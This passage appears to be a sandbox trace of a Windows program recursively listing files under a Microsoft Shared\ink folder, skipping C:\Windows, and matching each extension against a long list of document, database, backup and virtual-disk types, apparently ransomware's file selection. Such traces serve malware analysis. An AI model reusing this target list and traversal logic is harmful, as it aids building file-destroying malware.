(lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0039.978] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.978] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="mshwLatin.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll" [0039.978] PathFindExtensionW (pszPath="mshwLatin.dll") returned=".dll" [0039.978] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0039.978] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0039.978] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.978] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="nb-NO" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO" [0039.978] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO") returned 0x0 [0039.978] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*" [0039.978] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0039.979] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.979] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.979] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui" [0039.979] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.979] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.979] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.979] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.979] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.980] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.980] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="nl-NL" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL" [0039.980] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL") returned 0x0 [0039.980] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*" [0039.980] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0039.980] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.980] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.980] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\tipresx.dll.mui" [0039.980] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.980] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.980] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.981] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.981] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.981] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.981] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="pl-PL" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL" [0039.981] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL") returned 0x0 [0039.981] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*" [0039.981] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0039.992] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.992] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.992] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\tipresx.dll.mui" [0039.992] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.992] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.992] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.992] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.993] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.993] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.993] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="pt-BR" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR" [0039.993] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR") returned 0x0 [0039.993] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*" [0039.993] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0039.993] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.993] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.993] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\tipresx.dll.mui" [0039.993] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.994] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.994] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.994] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.994] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.994] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.994] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="pt-PT" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT" [0039.994] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT") returned 0x0 [0039.994] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*" [0039.994] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0039.994] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.995] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.995] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\tipresx.dll.mui" [0039.995] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.995] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.995] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.995] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.995] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.995] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.995] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ro-RO" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO" [0039.995] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO") returned 0x0 [0039.995] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*" [0039.995] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0039.996] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.996] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.996] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\tipresx.dll.mui" [0039.996] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.996] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.996] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.996] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.996] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.996] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.996] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="rtscom.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll" [0039.996] PathFindExtensionW (pszPath="rtscom.dll") returned=".dll" [0039.996] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0039.996] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0039.996] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.996] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ru-RU" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU" [0039.997] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU") returned 0x0 [0039.997] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*" [0039.997] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.005] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.006] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.006] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\tipresx.dll.mui" [0040.006] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0040.006] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.006] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.006] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.006] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.006] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.006] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ShapeCollector.exe" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe" [0040.006] PathFindExtensionW (pszPath="ShapeCollector.exe") returned=".exe" [0040.006] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".exe.") returned 5 [0040.006] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".exe.") returned 0x0 [0040.006] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.006] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="sk-SK" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK" [0040.006] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK") returned 0x0 [0040.007] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*" [0040.007] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.007] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.007] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.007] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui" [0040.007] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0040.007] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.007] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.007] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.008] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.008] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.008] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI") returned 0x0 [0040.008] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*" [0040.008] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.009] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.009] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.009] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0040.009] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.009] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.009] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.009] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.009] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.009] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="sr-Latn-CS" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS" [0040.010] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS") returned 0x0 [0040.010] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*" [0040.010] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.010] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: 